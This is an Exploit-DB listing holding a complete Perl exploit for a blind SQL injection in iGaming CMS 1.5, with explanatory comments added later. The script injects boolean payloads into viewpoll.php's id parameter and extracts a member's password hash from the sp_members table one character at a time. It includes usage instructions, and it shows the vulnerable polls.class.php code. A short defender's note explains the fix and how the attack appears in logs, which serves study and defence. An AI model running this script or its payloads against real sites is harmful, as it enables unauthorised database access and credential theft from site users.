iGaming CMS 1.5 – Blind SQL Injection

  • 作者: plucky
    日期: 2010-10-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15177/
  • #!/usr/bin/env perl
    
    =pod
    iGaming CMS <= 1.5 Blind SQL Injection
    
    Author: plucky
    Email: io.plucky@gmail.com
    Web Site: http://plucky.heliohost.org
    Crew : WarWolfZ
    
    Usage: perl exploit.pl <website> <user_id>
    Example: perl exploit.pl http://website.net/iGamingCMS1.5/ 1
    
    Vulnerability: polls.class.php
    [line 10-17]
    
    if (!empty($_REQUEST['id']))
    {
    $poll = $db->Execute("
    SELECT id,title
    FROM `sp_polls`
    WHERE `id` = '" . $_REQUEST['id'] . "'");
    
    $result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id"); 
    
    THX TO: shrod and warwolfz crew
    =cut
    
    use strict;
    use warnings;
    use LWP::Simple;
    
    # File-scoped state shared with the subs below: $password receives
    # run_exploit's return value, $vulnerable_page the base URL from
    # $ARGV[0], $target_id the row id from $ARGV[1].  header_exploit reads
    # $target_id directly rather than taking it as an argument.
    my $password = '';
    my $vulnerable_page= '';
    
    my $target_id=1;
    
    sub header_exploit {
        # Banner written to STDOUT before the probing loop starts.  Reads the
        # file-scoped $target_id (already set from @ARGV by the time this
        # runs); takes no arguments and returns nothing useful.
        my @banner_lines = (
            'iGaming CMS <= 1.5 Blind SQL Injection',
            '-----------------------------------------',
            'Author:plucky',
            'Email: io.plucky@gmail.com',
            '-----------------------------------------',
            '[!]Target id: ' . $target_id,
            '[!]Exploit Status: Working...',
        );
        # join() with a trailing "\n" yields one newline after every line,
        # exactly as the concatenated form did.
        print join("\n", @banner_lines), "\n";
    }
    
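    sub usage_exploit {
        # Prints the command-line synopsis and terminates the script.  Invoked
        # from the argument check at the bottom of the file whenever one of
        # the two positional arguments is missing (or is a false value such
        # as 0 — see the `||` there).
        #
        # $0 is the script name as invoked.  The example lines put a space on
        # each side of it; the original concatenation had none, so the
        # examples printed as "perlexploit.plhttp://..." and were not
        # copy-pasteable.
        print 'Usage:'. "\n".
        'perl exploit.pl http://[site]/[path]/ [id]'. "\n".
        'Examples:' . "\n".
        ' perl ' . $0 . ' http://web_site/cms/ 1' . "\n".
        ' perl ' . $0 . ' http://games_site/iGamingCMS1.5/ 1' . "\n";
    
        # Never returns to the caller.
        exit;
    }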
    
    # Recovers, one character at a time, the `pass` column of the sp_members
    # row whose id is $target_id, using the unescaped `id` value that
    # polls.class.php interpolates into its SQL (see the POD above).  Each
    # probe is one GET against viewpoll.php, and the response is classified
    # solely by whether it contains the word "Error".
    #
    # Arguments: two scalar references, \$target_id and \$vulnerable_page
    # (the site base URL, written with a trailing '/' in the usage examples
    # since it is concatenated directly with the query string).
    # Returns: the accumulated string, at most 32 characters; a position for
    # which no candidate matched contributes nothing, so the result can be
    # shorter than 32.
    #
    # Defender's note: the root cause is string-built SQL in polls.class.php.
    # Binding `id` as a query parameter (or casting it to an integer before
    # use) and not echoing database error text to the user removes the
    # boolean oracle this routine depends on.  Every iteration sends an id
    # parameter containing a quote and SQL keywords, so a burst of such
    # requests to viewpoll.php stands out clearly in access logs.
    sub run_exploit {
     
     my $parameter_id = shift;
     my $parameter_page = shift;
    
     # Dereference into local copies; the file-scoped variables of the same
     # names are shadowed inside this sub.
     my $target_id= $$parameter_id;
     my $vulnerable_page= $$parameter_page;
    
     my $character_id =1;
    
     my $HTML_source= '';
     my $SQL_Injection= '';
     my $hexadecimal_character= '';
     my $result = '';
     my $table= 'sp_members';
    
     # Codepoints 48..57 are '0'..'9' and 97..102 are 'a'..'f': the alphabet
     # of a lowercase hex string.  Together with the 32-position loop below
     # this suggests the column holds a 32-character hex digest rather than a
     # cleartext password — inferred, not shown by this file.
     my @hexadecimal_characters = ( 48..57, 97..102 );
    
    
     # Outer loop: one character position per iteration.
     foreach $character_id ( 1..32 ) {
     
     # Inner loop: try each hex digit for the current position.
     character_research:
    foreach $hexadecimal_character ( @hexadecimal_characters ) {
    
     # The trailing "\%23" is sent literally as "%23": in a double-quoted
     # Perl string only $ and @ interpolate, so the backslash before % is
     # unnecessary.
     $SQL_Injection= "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23"; 
     $HTML_source = get( $vulnerable_page.$SQL_Injection );
    
     # Oracle: a page with no "Error" text is taken to mean the comparison
     # above was true.
     if ( $HTML_source !~ /Error/i ) {
    
     $result .= chr($hexadecimal_character);
     # The outer foreach aliases $character_id to each value of 1..32 in
     # turn, so this increment does not skip a position; it is effectively
     # a no-op.
     $character_id++;
    
     # First hit wins; move on to the next position.
     last character_research;
     }
     }
     }
     
     return $result;
    }
    
    # Argument handling: both positional arguments are required.  `||` tests
    # truthiness, so an id of "0" (or an empty string) is treated as missing
    # and falls into usage_exploit, which exits.
    $vulnerable_page = $ARGV[0] || usage_exploit;
    $target_id = $ARGV[1] || usage_exploit;
    
    header_exploit;
    # References are passed; run_exploit copies them into its own lexicals.
    $password = run_exploit ( \$target_id, \$vulnerable_page );
    
    # Whatever run_exploit accumulated — from its hex alphabet and 32-position
    # loop this is most likely a stored hash rather than a cleartext password.
    print '[!]Password: ', $password, "\n";